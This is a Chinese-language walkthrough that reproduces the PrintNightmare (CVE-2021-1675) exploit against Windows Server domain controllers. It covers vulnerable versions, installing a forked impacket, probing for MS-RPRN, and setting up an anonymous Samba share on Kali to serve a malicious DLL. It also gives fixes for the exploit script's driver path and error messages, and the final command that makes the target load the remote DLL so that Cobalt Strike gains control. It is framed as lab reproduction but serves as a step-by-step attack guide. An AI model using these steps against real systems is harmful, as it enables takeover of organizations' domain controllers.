從exp出來的第一天開始,就想嘗試復現,無奈工具利用有坑點+本地環境有點問題,就放下了,今天嘗試復現一下,本文力求解決浮現過程中的眾多坑點。
一、使用工具
https://github.com/cube0x0/CVE-2021-1675
該工具是使用過程中會涉及許多需要注意的地方,文中慢慢說明。
二、復現環境准備
Windows Server 2019 1809 17763.1339成功/Windows Server 2016 1607 14393.1884成功) Windows Server 2012 9200版本失敗,因為沒有探測到Print System Remote Protocol) kali作為smb匿名共享機器+攻擊機 使用CobaltStrike上線目標機器 鏡像下載地址推薦:https://msdn.itellyou.cn
域環境搭建這里不做說明,如果需要請參考一篇我感覺手把手教學的文章
https://blog.csdn.net/qq_28205153/article/details/113827476?spm=1001.2014.3001.5502
安裝python3與impacket,python3安裝不做介紹,impacket按照下面安裝即可
pip3 uninstall impacket git clone https://github.com/cube0x0/impacket cd impacket python3 ./setup.py install
三、檢查是否具備漏洞
impacket中examples文件夾rpcdump.py Kali: rpcdump.py dc地址|grep MS-RPRN win: rcpdump.py dc地址|findstr MS-RPRN 出現此內容代表存在漏洞 Protocol: [MS-RPRN]: Print System Remote Protocol.
四、復現可能會出現的問題
- 配置smb匿名共享
配置kali的/etc/samba/smb.conf文件,在最開始復現時候,這個地方的坑點被坑了好久,死活報錯,這里按照該文配置即可
https://www.cnblogs.com/qingwuyou/p/10687452.html
具體配置如下
[global] workgroup = WORKGROUP server string = Samba Server netbios name = MYSERVER log file = /var/log/samba/log.%m max log size = 50 security = user map to guest = Bad User [smb] comment = Template Directories browseable = yes writeable = yes path = /tmp/ guest ok = yes
配置完畢以后,需要執行命令開啟samba服務即可
service smbd start
- pDriverPath問題
雖然最新版exp可以自己枚舉驅動目錄,但我安裝的WinServer2019版本會報錯枚舉失敗,如果失敗的話就只能手動置頂py腳本中的pDriverPath變量值,並把上一句注釋掉。
#blob = getDrivers(dce, handle) pDriverPath = ‘自定義路徑+\\UNIDRV.DLL'
- dll加載問題
dll加載一般會出現2個問題
1.exp執行完畢沒有報錯,但是就是不上線。---需要檢查dll是否是64位,建議重新生成64位dll測試。 2.exp執行過程報錯“DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied”。 ---檢查smb共享是否可以匿名訪問。 3.exp執行過程報錯“DCERPCSessionError: RPRN SessionError: code: 0x3 - ERROR_PATH_NOT_FOUND - The system cannot find the path specified.” ---檢查dll加載地址,kali下用單引號
四、復現
執行
Python3 CVE-2021-1675.py 域內普通用戶:用戶密碼@DC地址 ‘填入dll遠程加載地址’(kali下用單引號)
成功
